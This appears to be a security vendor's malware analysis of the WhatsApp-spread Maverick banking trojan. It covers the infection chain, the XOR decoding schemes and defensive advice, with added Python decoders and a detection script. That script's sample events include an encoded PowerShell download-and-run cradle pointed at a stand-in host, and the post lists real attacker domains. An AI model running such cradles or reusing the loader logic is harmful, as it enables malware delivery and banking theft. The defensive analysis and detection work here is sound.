Advanced Banking Trojan Maverick Uses WhatsApp to Prey on Brazilian Users
October 7, 2025 | 6 min read
Thomas Elkins and Joshua Green


The BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) researchers recently analyzed attacks by an adversary targeting users based in Brazil via WhatsApp. The attack lures users into downloading a zip archive. The zip archive contains a shortcut file (.lnk) which ultimately downloads and executes a banking trojan that BlueVoyant researchers have dubbed Maverick internally, based on the naming convention used by the attackers. While researching Maverick, BlueVoyant researchers identified parallels to a previously reported malware threat, Coyote, which also targeted users via WhatsApp.
Maverick Infection Chain
In all the incidents encountered at BlueVoyant, researchers observed users downloading zip archives from WhatsApp, indicating the adversary was targeting users explicitly via WhatsApp. After obtaining a few samples, BlueVoyant researchers observed that each zip archive contained a shortcut (.lnk) file whose purpose was to execute an obfuscated cmd[.]exe command. The command concatenated strings, ultimately assembling a Base64-encoded PowerShell script.

Figure 1 – Contents of shortcut (.lnk) files
The PowerShell script executes code hosted at a remote domain. Currently, BlueVoyant researchers have identified two domains being operated by the adversary:
- zapgrande[.]com
- sorvetenopote[.]com
BlueVoyant captured the server’s response, which delivered a follow-on PowerShell script. The script decodes a decimal array into a byte buffer and reflectively loads it in memory via PowerShell. The decoded buffer reconstructs a 64-bit .NET DLL, which is responsible for downloading additional payloads.
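The decimal-array step above is easy to reproduce on the analyst's side: pull the array out of a captured script, rebuild the byte buffer, and check whether it carries a PE header before loading anything. The following is an added example written for this post, not BlueVoyant's tooling or the actor's script; the script fragment it parses is constructed in the style described above (the array is a stub DOS header, not a real binary), and the `[Reflection.Assembly]::Load` check uses the documented .NET API rather than anything confirmed from the captured script.

```python
import re

# Constructed fragment in the style of the server-delivered script described above
# (not the actual script); the array is a stub DOS/PE header, not a real binary.
SAMPLE_SCRIPT = r"""
$payload = 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,
           184,0,0,0,0,0,0,0,64,0,0,0
[byte[]]$buf = [byte[]]$payload
[System.Reflection.Assembly]::Load($buf) | Out-Null
"""

# Eight or more comma-separated decimal literals; whitespace and newlines may sit between them.
DECIMAL_ARRAY = re.compile(r"(?:\d{1,3}\s*,\s*){7,}\d{1,3}")
# The documented .NET API for loading an assembly from a byte array (assumed, not taken from the sample).
REFLECTIVE_LOAD = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE)


def recover_decimal_arrays(script: str, min_len: int = 8) -> list[bytes]:
    """Find every decimal byte array in the script text and return each as bytes.
    Runs containing a value above 255 are skipped: they cannot be a byte array."""
    arrays = []
    for m in DECIMAL_ARRAY.finditer(script):
        values = [int(v) for v in re.split(r"\s*,\s*", m.group(0).strip())]
        if len(values) >= min_len and all(0 <= v <= 255 for v in values):
            arrays.append(bytes(values))
    return arrays


def triage(buf: bytes) -> dict:
    """Summarize the reconstructed buffer: size, whether it starts with 'MZ', first bytes."""
    return {"size": len(buf), "is_pe": buf[:2] == b"MZ", "head": buf[:8].hex()}


def uses_reflective_load(script: str) -> bool:
    """True when the script calls Assembly.Load on an in-memory buffer."""
    return REFLECTIVE_LOAD.search(script) is not None


if __name__ == "__main__":
    for buf in recover_decimal_arrays(SAMPLE_SCRIPT):
        print(triage(buf))
    print("reflective load:", uses_reflective_load(SAMPLE_SCRIPT))
```

On a real capture the recovered buffer can be written to disk and handed to a PE parser; the `is_pe` flag is only a first sanity check that the array really reconstructs an executable rather than a further obfuscation layer.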
Initial analysis of the .NET DLL showed that it was using a commercial obfuscator known as ArmDot. The obfuscator purposely scrambles functions and hides/encrypts strings to hinder analysis.

Figure 2 – Detect It Easy identifying Maverick Downloader protected with ArmDot
While debugging the .NET DLL, BlueVoyant researchers found that the sample embeds many key strings as byte blobs inside randomly named methods. At runtime, it reads bytes at predefined offsets from those blobs and XOR-decodes them with a single-byte key to recover the strings, including the URLs used to download additional payloads.
Once a payload is downloaded, the .NET DLL reads the fourth byte from the end of the payload as the XOR key length. It then reads the bytes immediately preceding that length byte and stores them as the XOR key. In our samples, the expected key size was always 0x10 (16 in decimal). Initial analysis of the decrypted payloads resembled shellcode.
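Both XOR schemes described above (the single-byte string decoding at fixed blob offsets, and the payload decryption whose key is recovered from the trailer) are simple enough to reimplement for offline analysis of captured artifacts. The block below is an added example, not BlueVoyant's code or the downloader's; the trailer layout it assumes is my reading of the description, namely `[ciphertext][key (N bytes)][N][3 trailing bytes]`, the repeating use of the 16-byte key over the body is an assumption, and the meaning of the final three bytes is not stated in the post, so they are treated as opaque. No real sample is embedded; `build_sample` constructs a test artifact in that layout so the decoder can be checked.

```python
EXPECTED_KEY_LEN = 0x10  # every analyzed sample used a 16-byte key per the write-up


def decode_blob_string(blob: bytes, offset: int, length: int, key: int) -> str:
    """Recover a string stored as a byte blob: slice at a fixed offset and XOR
    each byte with one single-byte key (the downloader's string scheme)."""
    if not 0 <= key <= 0xFF:
        raise ValueError("single-byte key expected")
    chunk = blob[offset:offset + length]
    if len(chunk) != length:
        raise ValueError("blob too short for the requested offset/length")
    return bytes(b ^ key for b in chunk).decode("utf-8", errors="replace")


def split_payload(payload: bytes) -> tuple[bytes, bytes]:
    """Return (ciphertext, key). Assumed layout: the fourth byte from the end holds
    the key length N, the N key bytes sit directly before it, and the body is
    everything before the key. The last three bytes are treated as opaque."""
    if len(payload) < 4:
        raise ValueError("payload too short to hold a trailer")
    key_len_pos = len(payload) - 4
    key_len = payload[key_len_pos]
    if key_len == 0 or key_len_pos - key_len < 0:
        raise ValueError(f"implausible key length {key_len}")
    key = payload[key_len_pos - key_len:key_len_pos]
    ciphertext = payload[:key_len_pos - key_len]
    return ciphertext, key


def decrypt_payload(payload: bytes) -> bytes:
    """XOR the body with the recovered key, repeating it across the body
    (assumption). A key length other than 0x10 is accepted but reported,
    since every observed sample used 0x10."""
    ciphertext, key = split_payload(payload)
    if len(key) != EXPECTED_KEY_LEN:
        print(f"note: key length {len(key)} differs from the observed 0x10")
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(ciphertext))


def build_sample(plaintext: bytes, key: bytes, trailer: bytes = b"\x00\x00\x00") -> bytes:
    """Construct a test artifact in the assumed layout so the decoder can be
    verified offline; this is not a real payload."""
    body = bytes(p ^ key[i % len(key)] for i, p in enumerate(plaintext))
    return body + key + bytes([len(key)]) + trailer


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: a decrypted .NET payload should begin with 'MZ'."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    # Constructed string blob: 8 bytes of padding, the XOR'd string, 4 bytes of padding.
    secret = "https://stage.example.invalid/next"
    blob = b"\xFF" * 8 + bytes(ord(c) ^ 0x5A for c in secret) + b"\xFF" * 4
    print(decode_blob_string(blob, 8, len(secret), 0x5A))

    key16 = bytes(range(0x10))
    sample = build_sample(b"MZ" + b"\x90" * 40, key16)
    plain = decrypt_payload(sample)
    print(looks_like_pe(plain), len(plain))
```

When applying this to a captured download, compare the recovered key length against 0x10 first: a different value is the quickest sign that the trailer layout has changed between variants and the decoder needs re-checking against the DLL.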
Researchers at TrendMicro recently released research on the same activity, naming the threat SORVEPOTEL. Consistent with their findings, BlueVoyant researchers observed that two distinct payloads were downloaded and reflectively loaded into separate instances of powershell_ise.exe.
Both payloads are implemented as .NET executables. The first contained a class named Maverick StageOne, the first of three components named Maverick in the code, which prompted the malware name Maverick. This component was designed to compromise the victim's WhatsApp application and propagate the initial ZIP archive to all contacts within the user's address book.
The second payload, which included a class named Maverick StageTwo, was designed to monitor the user's active browser session. It would extract the domain of the website currently being accessed and compare it against a hardcoded list of target domains. If a match was found, the payload would decrypt and execute an embedded binary referred to as Maverick Agent. This binary acted as a banking trojan and remote access trojan (RAT), enabling communication with a predefined command-and-control (C2) server to potentially steal sensitive information or provide remote access to the compromised system. BlueVoyant researchers observed that the Maverick Agent command and control (C2) communications use the Watson TCP client library for .NET (“Watson Client”) to handle the underlying TCP traffic.
Coyote to Maverick Evolution
BlueVoyant assesses the Maverick malware attack campaign is an evolution of the Coyote malware profiled in the Brazil-based Tempest’s SideChannel blog from late May 2025. The recently published (and updated on 4 October 2025) TrendMicro research describing SORVEPOTEL malware also supports this conclusion as it is from the same campaign BlueVoyant encountered.
BlueVoyant assesses that the core infection flow and targeting remain consistent across these linked malware campaigns. The thread running through the reported activity is a reliance on social engineering to deliver a ZIP containing a Windows LNK that decodes and runs an obfuscated PowerShell loader, which reflectively loads a .NET DLL and then injects shellcode to stage additional .NET payloads in memory. Furthermore, both the Coyote and Maverick (a.k.a. SORVEPOTEL) malware focus on Brazilian victims and financial targets, monitor active browsers for banking and crypto domains, and ultimately deliver a RAT/infostealer that can perform keylogging, capture screenshots, and manipulate windows. Both sets of reporting describe use of the Watson TCP/.NET client for C2 and memory-resident techniques to reduce disk artifacts. WhatsApp Web has also been central to propagation in recently described activity, with aggressive self-spreading that pushes the same malicious ZIP to the victim's contacts and groups, reinforcing the worm-like characteristics first noted in the Coyote lineage.
The newer Maverick analyses from TrendMicro, confirmed by this separate BlueVoyant research on the same activity, therefore represent a likely evolution of the Coyote malware. BlueVoyant's analysis further adds several reverse-engineering details, identifying the downloader's ArmDot obfuscation and its specific string-deobfuscation approach using byte blobs and XOR at fixed offsets. The use of ArmDot marks an evolution from the February 2025 timeline, in which Coyote used the Donut service for code obfuscation.
Moreover, BlueVoyant TFC research documents the exact XOR-decryption scheme for payloads (key length stored as the fourth byte from the end, with a 0x10 key size in observed samples), approximate payload sizes (~1.6 MB and ~107 KB), and the creation of two powershell_ise.exe instances to host each payload. This report also captures the server response flow, in which a PowerShell script decodes a decimal array into a byte buffer to reconstruct the 64-bit .NET DLL, and it names a distinct C2 for the RAT stage (casadecampoamazonas[.]com), providing variant-specific infrastructure that differs from earlier reporting.
Conclusion
BlueVoyant SOC and TFC researchers tracked and analyzed a malware campaign targeting Brazilian users via WhatsApp, where victims are lured into downloading a ZIP archive containing a shortcut (.lnk) file. This analysis confirms and adds to the details published by TrendMicro on this activity while also highlighting the similarities with a previous malware threat named Coyote, suggesting Maverick as its evolution.
As such, Maverick presents as WhatsApp-delivered banking malware that inherits and extends the Coyote malware lineage with a multi-stage, memory-resident chain, robust obfuscation, and targeted activation against Brazilian financial and crypto domains.
BlueVoyant’s analysis details an ArmDot-protected .NET downloader, custom request headers, disciplined XOR decryption, and powershell_ise.exe injection that culminate in a RAT with Watson TCP C2 and Brazil-specific geolocation gates. The campaign’s reliance on social trust, LNK shortcuts, and hidden, Base64-encoded PowerShell loaders, coupled with observed differences in header authentication across samples, underscores active development and rapid iteration by the adversary.
Defenders should prioritize controls that break this chain early and surface its telltale behaviors:
- Restrict or block execution of LNK attachments from messaging platforms; harden and monitor PowerShell (e.g., block powershell_ise.exe, alert on -enc, Invoke-Expression and Net.WebClient usage)
- Watch for obfuscated Startup BAT files and unusual registry or Startup-folder persistence
- Leverage EDR to detect in-memory .NET CLR hosting and shellcode injection
Network protections should block or flag traffic to identified infrastructure (e.g., zapgrande[.]com, sorvetenopote[.]com, casadecampoamazonas[.]com) and look for anomalous custom headers. Because WhatsApp is central to propagation, enforce clear BYOD and messaging policies, and educate users to distrust unsolicited ZIPs—even from known contacts.
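The PowerShell and network indicators in the recommendations above translate directly into detection logic. The block below is an added example, not a BlueVoyant detection or any vendor's rule: it applies four rules (encoded `-enc` command lines, decoded or plain download-cradle markers, powershell_ise.exe launches, and DNS lookups of the infrastructure named in this post) to a handful of constructed telemetry events. The events are modelled on the chain described above and are not real logs; the domains are the three named in the post, kept defanged in the source and normalized at load time, and the event schema (`type`, `image`, `parent`, `cmdline`, `query`) is an assumption for the example.

```python
import base64
import re

# Infrastructure named in the post, kept defanged here and normalized at load time.
KNOWN_DOMAINS = {"zapgrande[.]com", "sorvetenopote[.]com", "casadecampoamazonas[.]com"}
BLOCKLIST = {d.replace("[.]", ".").lower() for d in KNOWN_DOMAINS}

# -enc / -encodedcommand followed by a long base64 string (PowerShell accepts prefixes of the switch).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{40,})")
# Download-cradle markers called out in the recommendations above.
CRADLE = re.compile(r"(?i)invoke-expression|\biex\b|net\.webclient|downloadstring")


def decode_encoded_command(cmdline: str):
    """Return the decoded -enc payload (UTF-16LE, as PowerShell expects), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list[dict]:
    """Apply the rules to one event and return the findings it produces."""
    findings = []
    if event.get("type") == "process":
        image = event.get("image", "").lower()
        cmdline = event.get("cmdline", "")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append({"rule": "encoded_powershell", "detail": decoded.strip()})
        if image.endswith("powershell_ise.exe"):
            findings.append({"rule": "powershell_ise_launch", "detail": event.get("parent", "")})
        if CRADLE.search(cmdline) or (decoded and CRADLE.search(decoded)):
            findings.append({"rule": "download_cradle", "detail": cmdline[:80]})
    elif event.get("type") == "dns":
        q = event.get("query", "").replace("[.]", ".").lower().rstrip(".")
        if q in BLOCKLIST:
            findings.append({"rule": "known_c2_domain", "detail": q})
    return findings


def detect(events) -> list[dict]:
    """Run every event through the rules, tagging each finding with its event index."""
    return [{"event": i, **f} for i, ev in enumerate(events) for f in analyze_event(ev)]


def _enc(ps: str) -> str:
    """Build a -enc argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed events modelled on the chain described in the post; none are real telemetry.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -enc " + _enc(
         'IEX (New-Object Net.WebClient).DownloadString("https://stage.example.invalid/ps")')},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
     "parent": "powershell.exe", "cmdline": "powershell_ise.exe"},
    {"type": "dns", "query": "zapgrande[.]com"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"type": "dns", "query": "updates.example.invalid"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Decoding the `-enc` argument before matching matters: the cradle markers the post lists never appear in the visible command line of the loader, only in the Base64 body, so a rule that inspects the raw command line alone sees nothing but the flag.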
BlueVoyant will continue monitoring this campaign and recommends maintaining updated detections mapped to these TTPs as the actor iterates on infrastructure and loader authentication.